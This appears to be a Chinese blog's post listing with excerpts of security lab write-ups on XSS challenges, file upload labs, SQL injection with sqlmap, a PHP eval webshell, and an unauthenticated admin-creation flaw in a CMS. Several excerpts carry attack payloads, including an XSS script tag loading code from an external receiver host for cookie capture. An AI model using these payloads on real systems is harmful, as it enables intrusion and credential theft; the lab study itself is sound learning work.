- 博客(26)
- 收藏
- 关注
原创 macOS M2上安装 PBC库
出现上述问题,由于ARM架构下Homebrew的安装路径由/usr/local/变化到/opt/homebrew/所致。上面的环境变量可能有冗余,懒得测了,先都添加上吧。在Mac OS ARM架构下,出现找不到头文件。下载最新版本,或使用。若无错误,说明安装成功。
2025-03-10 11:35:23
208
原创 Acunetix Web Vulnarability Scanner手册(文末附资源)
Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。它包含有收费和免费两种版本,AWVS官方网站是:http://www.acunetix.com/,目前最新版是V14版本,官方下载地址:https://www.acunetix.com/vulnerability-scanner/download/,官方免费下载的是试用14天的版本。主菜单栏,设置菜单功能模块,更新设置栏,上方导航栏。
2025-01-02 11:22:43
1291
原创 mac m2配置Ubuntu22.02虚拟机docker代理
配置 Ubuntu 系统代理:在和中设置代理,以确保系统和包管理工具能够通过代理连接外网。配置 Docker 使用代理:在中配置 Docker 守护进程使用代理,并重启 Docker 服务。容器中设置代理(可选):在启动容器时使用-e设置代理环境变量,或者在Dockerfile中设置代理。检查防火墙和网络连接:排查防火墙或端口占用问题,确保代理能够正常工作。
2024-12-20 15:55:40
898
原创 zbzcms代码审计实验2
前台未授权添加管理员一、用seay代码审计系统,自动审计代码,发现可疑代码二、查看代码,并分析看看发现可疑参数mima和guanliyuan,即密码和管理员,构造URL/cms/cms/admin/run_ajax.php?run=admin构造payloadmima=haha123&guanliyuan=haha三、使用hackbar插件执行payload发现返回一个值为5尝试用构造的管理员用户和密码登录看看发现权限不足无法登录,这里有两种方
2021-12-15 14:19:20
3037
原创 代码审计之文件上传漏洞实验
一、phpstudy搭建zbzcms.com网站二、使用seay源代码审计工具1.进行自动审计,发现可疑文件上传的漏洞2.双击打开,分析代码,添加变量输出$_FILES添加代码如下:var_dump($_FILES);3.在网站根目录下新建html文件内容如下<html><head><meta charset="utf-8"><title>xxx</title></head><body><
2021-12-08 16:41:47
3554
原创 搭建域环境
一、准备两台机器并设置ip地址如下Windows server 2012 R2:192.168.1.1Windows server 2008 R2:192.168.1.2二、Windows Server 2012 R2服务器配置1.设置服务器设置ip为192.168.1.1子网掩码为255.255.255.0DNS指向本机ip地址设置为192.168.1.1或127.0.0.1——>控制面板>网络和Internet>网络和共享中心中打开Ethernet0配置网络Ipc
2021-12-07 11:53:41
410
原创 upload-labs通关教程
Pass-1-js检查源码:PHP文件直接上传发现不可以因为源码定义了上传文件类型检查删除下图位置return checkFile()php即可上传Pass-2-只验证Content-type源码:仅仅判断content-type类型,因此上传xx.php抓包修改content-type为图片类型:image/jpeg、image/png、image/gif成功过关Pass-3-黑名单绕过无解???...
2020-11-02 20:15:14
571
1
原创 phpstudy搭建upload-labs
下载并安装PHPstudy的安装包下载链接: http://www.phpstudy.net/ (https://www.xp.cn)打开phpstudy界面并开启服务创建网站配置upload-labs下载链接: https://github.com/c0ny1/upload-labs下载后解压放在我们之前安装好的phpstudy的WWW目录里打开网站访问即可访问成功...
2020-11-02 19:41:27
1998
原创 DOM型XSS
DOM-XSS攻击原理与防御XSS的中文名称叫跨站脚本,是WEB漏洞中比较常见的一种,特点就是可以将恶意HTML/JavaScript代码注入到受害用户浏览的网页上,从而达到劫持用户会话的目的。XSS根据恶意脚本的传递方式可以分为3种,分别为反射型、存储型、DOM型,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM型来说比较好检测与防御,而DOM型不用将恶意脚本传输到服务器在返回客户端,这就是DOM型和反射、存储型的区别,所以我这里就单独的谈一下DOM型XSS。...
2020-11-02 19:29:42
716
原创 xss平台练习
1.靶机蓝莲花BLUE-LOTUShttp://117.167.136.240:10080/admin.php默认登录密码:bluelotus2.靶机网站http://117.167.136.240:38001/找输入口找到输入口在register弹出框如下:添加新的default模板并生成payload复制payload:<script src="http://117.167.136.240:10080/myjs/s.js"></script>成
2020-10-22 21:12:58
600
原创 存储型XSS漏洞
什么是存储型XSS:攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。因为存储型XSS的代码存在于网页的代码中,可以说是永久型的。1.弹框测试添加js,选择alert.js点击生成payload并复制复制...
2020-10-21 21:42:30
2895
原创 BlueLotus_XSSReceiver——XSS数据接收工具的安装(靶机)
1.将BlueLotus_XSSReceiver放到PHPstudy_pro的www目录下2.打开phpstudy创建BlueLotus网站并创建数据库3.将网站根目录设置在新建网站的BlueLotus里的BlueLotus_XSSReceiver 下4.打开网站搭建成功5.复制后台登录密码登录即可...
2020-10-21 18:36:13
1663
原创 用phpStudy搭建DVWA漏洞测试环境
1.下载、安装PhpStudy下载地址传送门:http://phpstudy.php.cn/download.html2.下载、存放DVWA下载地址传送门:http://www.dvwa.co.uk/github项目:https://github.com/ethicalhack3r/DVWA下载后从压缩包DVWA-mater.zip解压出的文件夹名字是DVWA-master,为了方便url输入访问,可以把此名字修改为dvwa,然后把它存放到phpStudy的网站目录之下…\phpStudy2018
2020-10-21 12:40:25
880
1
原创 XSS挑战之旅level7-10
Level 7输入一个”>试试,发现script标签被删除了!Href和on也被删除了,尝试双写绕过Payload:“><scrscriptipt>alert(‘xss’)</scriscriptpt>“ oonnmouseover=alert ‘1’“><a hrhrefef=javasscriptcript:alert(‘xss’)>hh</a>Level 8基础知识:javascript:伪协议声明了URL的主体是任意
2020-10-19 21:59:01
289
原创 xss挑战之旅level1-6
什么是xss跨站点脚本(XSS)是向真实网站添加恶意代码以便恶意收集用户信息的过程。XSS 攻击可能通过 Web 应用程序中的安全漏洞进行,并且通常通过注入客户端脚本来利用。虽然通常使用 JavaScript,但一些攻击者也使用 VBScript,ActiveX 或 Flash。Level 1输入点在url中,反射型 http://192.168.152.129/level1.php?name=<script>alert(1)</script>Level 2搜索型,查
2020-10-15 22:10:18
338
1
原创 centos安装xss平台,及docker compose的下载
用xshell连接虚拟机中的centos7(上篇博客写过)1.安装xss平台下载xss源码zip打开xshell输入命令下载 lrzszyum install lrzsz输入rz上传文件XSS-challenge-tour.zip下载文件sz XSS-challenge-tour.zip解压下载的XSS-challenge-tour.zip文件unzip XSS-challenge-tour.zip到XSS-challenge-tour路径下cd XSS-chall
2020-10-14 22:59:59
823
原创 虚拟机配置及centos docker安装
1.查看虚拟机配置找到 控制面板 选择 卸载程序点击 启用或关闭Windows功能查看虚拟机平台是否关闭如果关闭虚拟机则会出现下面情况2.docker安装(1).使用官方安装脚本自动安装安装命令如下:curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun也可以使用国内 daocloud 一键安装命令:curl -sSL https://get.daocloud.io/docker | sh
2020-10-13 21:26:01
301
2
原创 sql注入之盲注
一.布尔型盲注题目:题目为sqllab-less-81.(1)正常页面回显?id=1 and 1=1 (2)页面出错?id=1' and 1=22.先判断数据库长度?id=0' or length(database())>7--+ true?id=0' or length(database())>8--+ false?id=0' or length(database())=8--+ true最后确认数据库长度为83.猜库名此时我们需要
2020-09-23 18:01:14
402
原创 CTF实例题
1.靶机目标 http://117.167.136.244:280572.靶机为post请求即用burpsuite抓包打开burpsuite3.用burpsuite对靶机进行抓包找到购买卡密进行购买卡密打开intercept抓包成功找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo4.用sqlmap注入(1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act
2020-09-17 22:18:11
1491
1
原创 PHP一句话木马实验
1.打开phpstudy启动Apache打开网站根目录新建shell.php文本文件编辑内容为(可使用notepad++编辑)2.进入靶机找到上传文件点并上传shell.php文件3.在新闻管理中找到实验1点击修改点击文件右键选择在 ‘新标签页中打开图片’显示如下图则成功4.打开蚁剑单击空白处点击右键’添加数据’URL地址为步骤3中 '新标签页中打开图片’的地址连接密码为shell(@eval($_POST[‘shell’]);)添加成功找到flag
2020-09-14 21:55:37
1358
原创 sqlmap注入简单实例
sqlmap详情见上篇《sqlmap安装及简单使用实例》1.打开 sqlmap ,通过命令 python sqlmap.py -u “url” --dump -T “manager” -D “rjxy" 找到目标密码2.目标密码为:ZGM2M2VlMmUyYTE2M2QONmE3MGFiNDRhNzUxYzBkMjA=用base64解密为:dc63ee2e2a163d46a70ab44a751c0d20再用MD5解码为:ahead8418最终完成解密...
2020-09-10 21:23:03
394
原创 sqlmap安装及简单使用实例
1.sqlmap安装前需要搭建python环境,下载python最新版本下载地址:https://www.python.org/downloads/下载完成Windows+r 打开cmd中输入python检查是否下好下载python成功2.下载sqlmap下载地址:http://sqlmap.org/3.将下载的SQLMAP安装包解压到文件夹sqlmap中,并拷贝到自己下好的python目录下 例如“D:\Program Files\Python38”4.然后在桌面新建立一个cmd的
2020-09-09 21:52:07
475
原创 centos搭建宝塔-宝塔安装sqllab的过程
centos搭建宝塔和宝塔搭建网站准备:在虚拟机中装centos环境,下载xshall和虚拟机ssh连接虚拟机,找到虚拟机ip地址,在虚拟机中输入 ip addr找到ipWindows用户打开xshell,点击新建,将虚拟机ip地址插入点击确认后,双击新建会话刷新连接输入用户和密码后成功建立连接3.安装宝塔面板https://www.bt.cn/bbs/thread-19376-1-1.html复制cent os 安装命令4.成功下载宝塔5.根据内网面板地址找到宝塔登
2020-09-08 21:45:14
354
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人